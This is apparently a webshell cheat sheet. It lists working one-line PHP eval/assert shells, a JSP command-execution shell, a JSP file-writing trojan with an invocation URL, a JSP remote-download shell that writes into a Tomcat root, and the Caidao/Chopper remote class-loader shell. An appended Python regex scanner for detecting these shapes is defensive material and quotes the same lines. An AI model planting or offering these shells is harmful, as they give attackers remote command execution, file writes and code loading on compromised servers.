<?php @eval(@$_POST[cmd]); ?>
<?php @assert($_POST['cmd']); ?>
jsp
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
File-writing trojan
<%
if(request.getParameter("f")!=null)(new
java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(
request.getParameter("t").getBytes());
%>
How to invoke the trojan: http://ip/shell2.jsp?f=1.txt&t=hello%20kitty

Remote file download and write
<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
baos.write(b, 0, a);
}
new java.io.FileOutputStream(application.getRealPath("\\")+"\\"+
request.getParameter("f")).write(baos.toByteArray());
%>
Downloads remotely from the Baidu website and places the file in the victim's Tomcat root directory
http://ip:port/shell3.jsp?f=3.png&u=http://www.baidu.com/img/bdlogo.png
Caidao (Chopper) trojan
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new
java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new
Object[]{request.getParameterMap()})%>
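
Added example, not part of the original page: a Python scanner a defender could run over a web root to flag files containing the snippet shapes listed above. The rule names, function names and sample files are assumptions made for illustration.

```python
import re
from pathlib import Path

# Heuristic rules, one per snippet shape on this page (rule names are made up here).
RULES = {
    # eval()/assert() fed directly from request data
    "php-eval-request": re.compile(
        r"\b(?:eval|assert)\s*\(\s*@?\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    # Runtime.exec() on a request parameter
    "jsp-exec-param": re.compile(
        r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(\s*request\s*\.\s*getParameter"),
    # FileOutputStream whose path is web root + request parameter
    "jsp-write-param-path": re.compile(
        r"FileOutputStream\s*\(\s*application\s*\.\s*getRealPath\s*\([^)]*\)"
        r"[^;]*?request\s*\.\s*getParameter"),
    # URL object built from a request parameter (remote fetch)
    "jsp-url-from-param": re.compile(
        r"new\s+(?:java\.net\.)?URL\s*\(\s*request\s*\.\s*getParameter"),
    # URLClassLoader on a request-supplied URL followed by reflective invoke()
    "jsp-remote-classloader": re.compile(
        r"URLClassLoader\s*\(.{0,200}?request\s*\.\s*getParameter.{0,200}?\.invoke\s*\(", re.S),
}

def scan_text(text):
    """Return the sorted names of all rules that match the given source text."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_tree(root, exts=(".php", ".jsp", ".jspx")):
    """Map each script file under root to the rules it triggers."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples: two shapes from this page and one benign JSP expression.
SAMPLES = {
    "shell.php": "<?php @eval(@$_POST[cmd]); ?>",
    "upload.jsp": r'<% new java.io.FileOutputStream(application.getRealPath("\\")+'
                  '\nrequest.getParameter("f")).write(request.getParameter("t").getBytes()); %>',
    "index.jsp": '<%= request.getParameter("name") %>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_text(body) or "clean")
```

These are signature heuristics for the literal shapes above; encoded or split-string variants will not match, so a clean result is inconclusive.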